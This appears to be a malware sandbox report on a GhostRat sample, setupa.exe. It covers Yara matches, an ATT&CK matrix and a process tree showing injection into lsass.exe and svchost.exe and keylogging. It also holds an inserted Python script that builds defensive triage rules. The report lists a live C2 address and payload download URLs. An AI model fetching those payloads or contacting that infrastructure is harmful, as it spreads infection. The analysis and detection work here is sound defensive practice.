                      Source: Yara matchFile source: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318618858.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246797998.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043504278.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3346097174.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349931132.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3348722522.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2338206272.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292521835.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3347172652.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349260884.0000000005130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2235102743.0000000004452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292583935.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2308042453.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043573393.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3636, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3300f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3a05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318618858.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246797998.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043504278.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3346097174.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349931132.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3348722522.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2338206272.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292521835.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3347172652.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349260884.0000000005130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2235102743.0000000004452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292583935.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2308042453.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043573393.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3636, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641E97 Concurrency::details::WorkItem::BindTo,0_2_00007FF689641E97
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896410D2 Concurrency::details::SchedulerBase::ListenAffinity,0_2_00007FF6896410D2
MITRE ATT&CK matrix (Joe Sandbox layout: a number in front of a technique is the report's signature-hit badge for that cell, reproduced as shown; cells without a number are the matrix's unmatched placeholders)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 121 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 121 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 622 Process Injection | 1 Install Root Certificate | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 37 System Information Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 151 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 123 Masquerading | DCSync | 141 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 141 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 622 Process Injection | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Indicator Removal | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1527612; Sample: setupa.exe; Start date: 07/10/2024; Architecture: WINDOWS; Score: 100

The graph below is given as a process tree. Node numbers are the graph's own; a trailing badge number is the icon count the graph shows next to the process (see the legend above for icon meanings); "ports as listed" reproduces the graph's port list in its original order.

Top level (node 2)
  DNS/IP: kehu8.oss-cn-hongkong.aliyuncs.com; fp2e7a.wpc.phicdn.net; fp2e7a.wpc.2be4.phicdn.net
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected GhostRat; 4 other signatures
  Started: setupa.exe (node 9)

setupa.exe (node 9; badge 4)
  DNS/IP: kehu8.oss-cn-hongkong.aliyuncs.com 47.79.64.157, ports as listed 443, 49704, 49705; VODAFONE-TRANSIT-ASVodafoneNZLtdNZ; United States
  Dropped: C:\Program Files\upupoo-classicshell.exe (PE32); C:\Program Files\ClassicStartMenuDLL.dll (PE32)
  Signatures: Contain functionality to detect virtual machines; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  Injected: lsass.exe (node 14)
  Started: upupoo-classicshell.exe (node 17)

lsass.exe (node 14; badge 16; injected)
  Signatures: Installs new ROOT certificates; Creates files in the system32 config directory; Writes to foreign memory regions
  Started: upupoo-classicshell.exe (node 20); svchost.exe (node 25; badges 11, 1); dllhost.exe (node 27)
  Injected: svchost.exe (node 23)

upupoo-classicshell.exe (node 17; badge 1)
  Dropped: C:\Users\...\upupoo-classicshell.exe (copy) (PE32); C:\Users\...\ClassicStartMenuDLL.dll (copy) (PE32)
  Signatures: Allocates memory in foreign processes
  Started: svchost.exe (node 29; badge 3); WerFault.exe (node 32; badge 16)

upupoo-classicshell.exe (node 20)
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes
  Started: svchost.exe (node 34); WerFault.exe (node 37; badge 21)

svchost.exe (node 29)
  DNS/IP: 47.239.116.158, ports as listed 49707, 49709, 49728; CHARTER-20115US; United States
  Signatures: Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes

svchost.exe (node 34)
  Signatures: System process connects to network (likely due to code injection or exploit)
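The chain in the graph (a dropped binary under C:\Program Files spawning svchost.exe, lsass.exe spawning children after injection, a copy running from the Public profile, and an injected svchost.exe reaching 47.239.116.158) is what a responder would turn into triage rules. The following is an added example for this page, not Joe Sandbox or GhostRat code: it runs a handful of such rules over constructed process-creation and network events that mirror the graph. Field names are Sysmon-style conventions chosen here; the list of legitimate svchost.exe parents and the on-disk path used for the copy that lsass.exe launches (node 20) are assumptions, not report data.

```python
"""Triage rules for the infection chain in the behaviour graph above.

Added example for this page; it is not Joe Sandbox or GhostRat code. The events
are constructed to mirror the graph (process nodes 9, 17, 20, 25, 27, 29 and the
two contacted IPs); field names are Sysmon-style conventions chosen here. The
legitimate svchost.exe parent list and the on-disk path of the copy that
lsass.exe launches (node 20) are assumptions, not report data.
"""
from dataclasses import dataclass
from typing import List, Set, Tuple

# Indicators taken from the report.
C2_IPS = {"47.239.116.158"}      # reached by the svchost.exe started from the dropped binary (node 29)
STAGING_IPS = {"47.79.64.157"}   # kehu8.oss-cn-hongkong.aliyuncs.com, payload download over 443
DROPPED_PATHS = {
    r"c:\program files\upupoo-classicshell.exe",
    r"c:\program files\classicstartmenudll.dll",
    r"c:\users\public\documents\upupoo-classicshell.exe",
}
# Parents that legitimately create svchost.exe on a default install (assumption; tune per estate).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "ngen.exe"}


@dataclass(frozen=True)
class Event:
    kind: str               # "process" (creation) or "network" (outbound connection)
    image: str              # full path of the acting process
    pid: int
    parent_image: str = ""  # creating process, for kind == "process"
    dest_ip: str = ""       # remote address, for kind == "network"


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: List[Event]) -> List[Tuple[int, str]]:
    """Return one (pid, reason) pair for every rule an event trips."""
    findings: List[Tuple[int, str]] = []
    for e in events:
        image = e.image.lower()
        parent = basename(e.parent_image)
        if e.kind == "process":
            # svchost.exe that was not created by the service control manager.
            if basename(image) == "svchost.exe" and parent not in SVCHOST_PARENTS:
                findings.append((e.pid, f"svchost.exe started by {parent}"))
            # lsass.exe does not spawn children; the graph shows it doing so after injection.
            if parent == "lsass.exe":
                findings.append((e.pid, "child process of lsass.exe"))
            # Execution from the world-writable Public profile, where the report saw a copy of the binary.
            if image.startswith("c:\\users\\public\\"):
                findings.append((e.pid, "execution from C:\\Users\\Public"))
            if image in DROPPED_PATHS:
                findings.append((e.pid, "known dropped file path"))
        elif e.kind == "network":
            if e.dest_ip in C2_IPS:
                findings.append((e.pid, f"connection to C2 address {e.dest_ip}"))
            elif e.dest_ip in STAGING_IPS:
                findings.append((e.pid, f"connection to staging host {e.dest_ip}"))
    return findings


def flagged_pids(events: List[Event]) -> Set[int]:
    return {pid for pid, _ in triage(events)}


# Constructed events mirroring the behaviour graph; pids reuse the graph node numbers.
SAMPLE_EVENTS = [
    Event("process", r"C:\Users\user\Desktop\setupa.exe", 9, r"C:\Windows\explorer.exe"),
    Event("network", r"C:\Users\user\Desktop\setupa.exe", 9, dest_ip="47.79.64.157"),
    Event("process", r"C:\Program Files\upupoo-classicshell.exe", 17, r"C:\Users\user\Desktop\setupa.exe"),
    Event("process", r"C:\Windows\System32\svchost.exe", 29, r"C:\Program Files\upupoo-classicshell.exe"),
    Event("network", r"C:\Windows\System32\svchost.exe", 29, dest_ip="47.239.116.158"),
    # Assumed path for node 20: the "(copy)" the AV table lists under C:\Users\Public\Documents.
    Event("process", r"C:\Users\Public\Documents\upupoo-classicshell.exe", 20, r"C:\Windows\System32\lsass.exe"),
    Event("process", r"C:\Windows\System32\svchost.exe", 25, r"C:\Windows\System32\lsass.exe"),
    Event("process", r"C:\Windows\System32\dllhost.exe", 27, r"C:\Windows\System32\lsass.exe"),
    # Benign control: a service host created by services.exe talking to a documentation-range address.
    Event("process", r"C:\Windows\System32\svchost.exe", 1000, r"C:\Windows\System32\services.exe"),
    Event("network", r"C:\Windows\System32\svchost.exe", 1000, dest_ip="203.0.113.10"),
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The parent-process rules carry the signal here: the IP and path indicators change from build to build, but a GhostRat-style injector still has to produce an svchost.exe with the wrong parent, or an lsass.exe that spawns something, to run as it does in this report. Note that the rules fire only on the data each event carries, so a copy of the binary that the attacker renames or moves out of the Public profile is caught by the parent rules, not the path rules.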



| Source | Detection | Scanner | Label |
|---|---|---|---|
| setupa.exe | 11% | Virustotal | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Program Files\upupoo-classicshell.exe | 0% | ReversingLabs | |
| C:\Users\Public\Documents\upupoo-classicshell.exe (copy) | 0% | ReversingLabs | |

No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| fp2e7a.wpc.phicdn.net | 0% | Virustotal | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/wsdl/erties | 0% | Virustotal | |
| http://schemas.xmlsoap.org/ws/2004/09/policy1p | 0% | Virustotal | |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe |
| http://upx.sf.net | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/02/trust/Issue | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/02/sc | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd | 0% | URL Reputation | safe |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/DeviceQuery.srf | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/ResolveUser.srf | 0% | Virustotal | |
| http://Passport.NET/tbA | 0% | Virustotal | |
| http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utili0728275966HRDQJD | 0% | Virustotal | |
| https://login.microsoftonline.com/MSARST2.srf | 0% | Virustotal | |
| http://docs.oasis-open.org/wss/2 | 0% | Virustotal | |
| http://Passport.NET/STS | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/DeviceQuery.srf- | 0% | Virustotal | |
| http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf% | 0% | Virustotal | |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds | 0% | Virustotal | |
| http://schemas.xmlsoap.org/ws/2005/02/scdom | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/devicechangecredential.srf | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf. | 0% | Virustotal | |
| http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd | 0% | Virustotal | |
| https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf | 0% | Virustotal | |
| https://account.live.com/InlineSignup.aspx?iww=1&id=80502 | 0% | Virustotal | |
| http://docs.oasis-open.org/ws-sx/ws-trust/200512 | 0% | Virustotal | |
| http://Passport.NET/tb_ | 0% | Virustotal | |
| http://Passport.NET/tb | 0% | Virustotal | |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603 | 0% | Virustotal | |
| https://signup.live.com/signup.aspx | 0% | Virustotal | |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601 | 0% | Virustotal | |
| https://login.live | 0% | Virustotal | |
| http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | 0% | Virustotal | |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600 | 0% | Virustotal | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| kehu8.oss-cn-hongkong.aliyuncs.com | 47.79.64.157 | true | false | | unknown |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.ox | false | | unknown |
| https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exe | false | | unknown |
